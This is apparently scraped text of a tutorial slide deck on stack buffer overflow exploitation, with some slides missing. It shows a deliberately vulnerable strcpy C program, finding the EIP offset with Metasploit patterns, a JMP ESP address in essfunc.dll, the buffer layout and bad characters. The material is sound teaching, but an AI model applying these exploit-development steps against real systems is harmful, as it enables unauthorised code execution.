This document discusses conducting a buffer overflow attack against a vulnerable program. It describes the stack structure and how overflowing a buffer can overwrite the instruction pointer to redirect execution. Specifically, it shows finding the offset to overwrite the EIP, locating a "JMP ESP" instruction to redirect execution, adding shellcode, and dealing with bad characters. The final buffer structure pushes shellcode onto the stack and redirects to it to execute the attack. However, it notes these attacks should only be tested with explicit permission.
Powerful Google developer tools for immediate impact! (2023-24 C)
Exploiting buffer overflows
1.
2. Disclaimer
@cyberkryption
The views expressed within this presentation or afterwards are my
own and in no way represent my employer.
The following presentation describes how to conduct a buffer
overflow attack.
These attacks are illegal to perform against systems that you do
not have explicit permission to test.
I assume no responsibility for any actions you perform based on the
content of this presentation or subsequent conversations.
Caveat: With knowledge comes responsibility
7. Meet the Stack
Each program has it's own stack as a
memory structure.
Program data such as variable are also
saved
Data is 'pushed' on to the stack and
'popped' off the stack
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
8. A Vulnerable 'C' program
#include<stdio.h>
int main(int argc, char *argv[])
{
char buff[20];
printf("copying into buffer");
strcpy(buff,argv[1]);
return 0;
}
We defined a character
of size 20 bytes, it
reserves some space on
the stack
We copy the buffer using
string copy without
checking it's size
If we pass more then the buffer size (20 bytes) we get a buffer
overflow !!!
9. Stack Overwrite
Data on the stack is overwritten.
Extra input overwrites other data in the
stack
Eventually the instruction pointer is
overwritten and we have control!!!
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
10. Meet the CPU Registers & Pointers
CPU Pointers
EIP = Points to the next
address in memory to be
executed
ESP = Stack Pointer.
EBP = Stack Pointer Base
Pointer
If we can overwrite EIP we can control execution flow other wise it's a DOS exploit.
CPU Registers
EAX Accumulator
EBX Base Register
ECX Counter Register
EDX Data Register
15. Path to Victory
Determine Buffer Length.
Any Register pointing to buffer?
Locate EIP overwrite offset in buffer.
Enough space for shellcode?
Determine JMP ESP location ?
Resolve any bad characters
'A' *3000 / ESP =
Buffer
????????
????????
????????
18. How to Locate EIP Overwrite
● After crash with cyclic pattern, we find characters of
396F4348 overwriting the EIP register
● Metasploit pattern_create.rb to create a
cyclic pattern of 3000 non repeating
characters.
● Lastly use pattern offset to find EIP overwrite
● Use convert.sh for HEX to ASCII conversion
24. Path to Victory
Determine Buffer Length.
Any Register pointing to buffer?
Locate EIP overwrite offset in buffer.
Enough space for shellcode?
Determine JMP ESP location ?
Resolve any bad characters
'A' *3000 / ESP =
Buffer
4 Bytes > 2006 +
980 bytes shellcode
EIP Overwite'A' * 2006 Shellcode
Buffer Construction
625011AF in
essfunc.dll
????????
25. The Bad Character Problem
Hex Dec Description
--- --- ---------------------------------------------
0x00 0 Null byte, terminates a C string
0x0A 10 Line feed, may terminate a command line
0x0D 13 Carriage return, may terminate a command line
0x20 32 Space, may terminate a command line argument
Bad Characters break our code when executed on the stack, for example 0x00
will stop our code executing!!